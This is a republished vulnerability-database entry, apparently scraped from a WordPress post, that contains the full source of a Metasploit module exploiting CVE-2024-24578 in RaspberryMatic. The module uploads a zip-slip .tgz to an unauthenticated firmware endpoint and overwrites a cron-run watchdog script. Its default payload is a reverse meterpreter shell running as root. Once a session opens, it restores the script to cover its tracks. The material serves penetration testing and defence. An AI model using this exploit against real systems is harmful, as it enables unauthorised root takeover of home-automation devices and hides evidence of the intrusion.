{“lastseen”:”2025-08-29T19:25:55″,”description”:”RaspberryMatic \/ OCCU contains a unauthenticated remote code execution (RCE) vulnerability, caused by multiple issues within the Java…”,”published”:”2025-08-29T18:53:34″,”modified”:”2025-02-21T18:53:17″,”type”:”metasploit”,”title”:”RaspberryMatic unauthenticated Remote Code Execution vulnerability through HMServer File Upload.”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-LINUX-HTTP-RASPBERRYMATIC_UNAUTH_RCE_CVE_2024_24578-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2024-24578″],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Remote\\n Rank = ExcellentRanking\\n\\n include Msf::Exploit::Remote::HttpClient\\n prepend Msf::Exploit::Remote::AutoCheck\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘RaspberryMatic unauthenticated Remote Code Execution vulnerability through HMServer File Upload.’,\\n ‘Description’ =\\u003e %q{\\n RaspberryMatic \/ OCCU contains a unauthenticated remote code execution (RCE) vulnerability, caused by multiple\\n issues within the Java based HMIPServer.jar component. The webui allows for Firmware uploads which can be reached\\n through the URL `\/pages\/jpages\/system\/DeviceFirmware\/addFirmware`.\\n This allows an unauthenticated attacker to upload a malicious .tgz archive to the server, which will be\\n automatically extracted without any further checks. As this entry can contain ..\/sequences, it is possible to\\n break out of the predefined temp directory and write files to other locations outside this path.\\n\\n This vulnerability is commonly known as the Zip Slip vulnerability and can be used to overwrite arbitrary files\\n on the main filesystem. It is therefore possible to overwrite the watchdog script with a malicious payload in\\n `\/usr\/local\/addons\/mediola\/bin\/`, which will be executed every five minutes through a cron job where attackers\\n can gain remote code execution as root user, allowing a full system compromise.\\n\\n RaspberryMatic versions \\u003c= `3.73.9.20240130` are vulnerable.\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e [\\n ‘h00die-gr3y \\u003ch00die.gr3y[at]gmail.com\\u003e’, # MSF module contributor\\n ‘h0ng10 \\u003chttps:\/\/git.hub\/h0ng10\\u003e’ # discovery of this vulnerability\\n ],\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2024-24578’],\\n [‘URL’, ‘https:\/\/attackerkb.com\/topics\/ywHhBnSObR\/cve-2024-24578’],\\n [‘URL’, ‘https:\/\/github.com\/jens-maus\/RaspberryMatic\/security\/advisories\/GHSA-q967-q4j8-637h’]\\n ],\\n ‘DisclosureDate’ =\\u003e ‘2024-03-16’,\\n ‘Platform’ =\\u003e [‘unix’, ‘linux’],\\n ‘Arch’ =\\u003e [ARCH_CMD],\\n ‘Privileged’ =\\u003e true,\\n ‘Targets’ =\\u003e [\\n [\\n ‘Unix\/Linux Command’,\\n {\\n ‘Platform’ =\\u003e [‘unix’, ‘linux’],\\n ‘Arch’ =\\u003e [ARCH_CMD],\\n ‘Type’ =\\u003e :unix_cmd,\\n ‘DefaultOptions’ =\\u003e {\\n ‘PAYLOAD’ =\\u003e ‘cmd\/linux\/http\/aarch64\/meterpreter_reverse_tcp’,\\n ‘FETCH_WRITABLE_DIR’ =\\u003e ‘\/tmp’\\n }\\n }\\n ]\\n ],\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘DefaultOptions’ =\\u003e {\\n ‘SSL’ =\\u003e true,\\n ‘RPORT’ =\\u003e 443,\\n ‘WfsDelay’ =\\u003e 5 * 60 # wait at least five minutes for RCE\\n },\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION, EVENT_DEPENDENT],\\n ‘SideEffects’ =\\u003e [IOC_IN_LOGS, ARTIFACTS_ON_DISK, CONFIG_CHANGES]\\n }\\n )\\n )\\n register_options([\\n OptString.new(‘TARGETURI’, [ true, ‘The RaspberryMatic endpoint URL’, ‘\/’ ]),\\n ])\\n end\\n\\n # Method to construct malicious file in .tgz form\\n # @param payload [String] to upload\\n # @param fpath [String] to write the payload contents\\n # @return [Rex::Text] Malicious .tgz form\\n def create_malicious_tgz(payload, fpath)\\n tarfile = StringIO.new\\n Rex::Tar::Writer.new tarfile do |tar|\\n tar.add_file(fpath.to_s, 0o777) do |io|\\n io.write payload\\n end\\n end\\n # tarfile.rewind\\n # tarfile.close\\n\\n Rex::Text.gzip(tarfile.string)\\n end\\n\\n # CVE-2024-24578: remote code execution via zip slip overwriting watchdog script\\n # affected components:\\n # web endpoint \/pages\/jpages\/system\/DeviceFirmware\/addFirmware\\n # shell script \/usr\/local\/addons\/mediola\/bin\/watchdog\\n def execute_command(cmd, _opts = {})\\n # create malicious compressed tar file (tgz) to overwrite watchdog script\\n # with malicious payload triggering the RCE\\n fname = Rex::Text.rand_text_alphanumeric(8..12)\\n fpath = ‘..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/\/usr\/local\/addons\/mediola\/bin\/watchdog’\\n payload_tgz = create_malicious_tgz(cmd, fpath)\\n\\n # construct multipart form data\\n form_data = Rex::MIME::Message.new\\n form_data.add_part(payload_tgz, ‘application\/gzip’, ‘binary’, \\”form-data; name=\\\\\\”file\\\\\\”; filename=\\\\\\”#{fname}.tgz\\\\\\”\\”)\\n\\n # upload the malicious tgz file\\n print_status(\\”Uploading #{fname}.tgz\\”)\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘pages’, ‘jpages’, ‘system’, ‘DeviceFirmware’, ‘addFirmware’),\\n ‘ctype’ =\\u003e \\”multipart\/form-data; boundary=#{form_data.bound}\\”,\\n ‘data’ =\\u003e form_data.to_s\\n })\\n fail_with(Failure::NoAccess, \\”Upload #{fname}.tgz is not successful.\\”) unless res\\u0026.code == 200 \\u0026\\u0026 res.body.include?(‘${addDevFirmwareInfoCorrupt}’)\\n print_status(‘Waiting 5 minutes for watchdog execution via cron to trigger the RCE.’)\\n end\\n\\n def on_new_session(session)\\n # restore orginal watchdog script to cover our tracks\\n print_status(‘Restoring original watchdog script.’)\\n if session.type == ‘meterpreter’\\n session.sys.process.execute(‘\/bin\/sh’, ‘-c \\”echo -ne \\\\’#!\/bin\/sh\\\\nif [ -e \/etc\/config\/neoDisabled ];then\\\\n\\\\texit 0\\\\nfi\\\\n\\\\n\\\\’ \\u003e \/usr\/local\/addons\/mediola\/bin\/watchdog\\”‘)\\n session.sys.process.execute(‘\/bin\/sh’, ‘-c \\”echo -ne \\\\’if [ -e \/usr\/local\/addons\/mediola\/Disabled ];then\\\\n\\\\texit 0\\\\nfi\\\\n\\\\n\\\\’ \\u003e\\u003e \/usr\/local\/addons\/mediola\/bin\/watchdog\\”‘)\\n session.sys.process.execute(‘\/bin\/sh’, ‘-c \\”echo -ne \\\\’PIDOFD=\\\\$(pgrep -f \\\\\\”neo_server.*automation.js\\\\\\”)\\\\n\\\\n\\\\’ \\u003e\\u003e \/usr\/local\/addons\/mediola\/bin\/watchdog\\”‘)\\n session.sys.process.execute(‘\/bin\/sh’, ‘-c \\”echo -ne \\\\’if [ -z \\\\\\”\\\\$PIDOFD\\\\\\” ]; then\\\\n\\\\t\/usr\/local\/etc\/config\/rc.d\/97NeoServer start\\\\nfi\\\\n\\\\’ \\u003e\\u003e \/usr\/local\/addons\/mediola\/bin\/watchdog\\”‘)\\n else\\n session.shell_command_token(\\”echo -ne ‘#!\/bin\/sh\\\\nif [ -e \/etc\/config\/neoDisabled ];then\\\\n\\\\texit 0\\\\nfi\\\\n\\\\n’ \\u003e \/usr\/local\/addons\/mediola\/bin\/watchdog\\”)\\n session.shell_command_token(\\”echo -ne ‘if [ -e \/usr\/local\/addons\/mediola\/Disabled ];then\\\\n\\\\texit 0\\\\nfi\\\\n\\\\n’ \\u003e\\u003e \/usr\/local\/addons\/mediola\/bin\/watchdog\\”)\\n session.shell_command_token(\\”echo -ne ‘PIDOFD=$(pgrep -f \\\\\\”neo_server.*automation.js\\\\\\”)\\\\n\\\\n’ \\u003e\\u003e \/usr\/local\/addons\/mediola\/bin\/watchdog\\”)\\n session.shell_command_token(\\”echo -ne ‘if [ -z \\\\\\”$PIDOFD\\\\\\” ]; then\\\\n\\\\t\/usr\/local\/etc\/config\/rc.d\/97NeoServer start\\\\nfi\\\\n’ \\u003e\\u003e \/usr\/local\/addons\/mediola\/bin\/watchdog\\”)\\n end\\n super\\n end\\n\\n def check\\n print_status(\\”Checking if #{peer} can be exploited.\\”)\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘\/config\/help.cgi’)\\n })\\n return CheckCode::Unknown(‘No valid response received from target.’) unless res\\u0026.code == 200 \\u0026\\u0026 res.body.include?(‘${dialogHelpInfoLblVersion}’)\\n\\n # parse the version number\\n # Examples:\\n # ${dialogHelpInfoLblVersion} 3.73.9.20240130\\n # ${dialogHelpInfoLblVersion} 3.73.9\\n version = res.body.match(\/\\\\$\\\\{dialogHelpInfoLblVersion\\\\}\\\\s*\\\\d{1,2}\\\\.\\\\d{1,2}\\\\.\\\\d{1,2}\/)\\n # when found, remove whitespaces to avoid suprises in string splitting and comparison\\n unless version.nil?\\n version_number = version[0].gsub(\/[[:space:]]\/, ”).split(‘}’)[1]\\n # Check if target is vulnerable\\n if version_number\\n if Rex::Version.new(version_number) \\u003c= Rex::Version.new(‘3.73.9’)\\n return CheckCode::Appears(\\”RaspberryMatic #{version_number}\\”)\\n else\\n return CheckCode::Safe(\\”RaspberryMatic #{version_number}\\”)\\n end\\n end\\n end\\n CheckCode::Unknown(\\”Parsing version info from #{normalize_uri(target_uri.path, ‘\/config\/help.cgi’)} failed.\\”)\\n end\\n\\n def exploit\\n print_status(\\”Executing #{target.name} for #{datastore[‘PAYLOAD’]}\\”)\\n case target[‘Type’]\\n when :unix_cmd\\n execute_command(payload.encoded)\\n end\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/linux\/http\/raspberrymatic_unauth_rce_cve_2024_24578.rb”,”cvss”:{“score”:10,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:C\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/exploit\/linux\/http\/raspberrymatic_unauth_rce_cve_2024_24578\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-08-29T19:25:55″,”description”:”RaspberryMatic \/ OCCU contains a unauthenticated remote code execution (RCE) vulnerability, caused by multiple issues within the Java…”,”published”:”2025-08-29T18:53:34″,”modified”:”2025-02-21T18:53:17″,”type”:”metasploit”,”title”:”RaspberryMatic unauthenticated Remote Code Execution vulnerability through HMServer…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,36,12,169,13,7,11,5],"class_list":["post-15135","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-100","tag-exploit","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n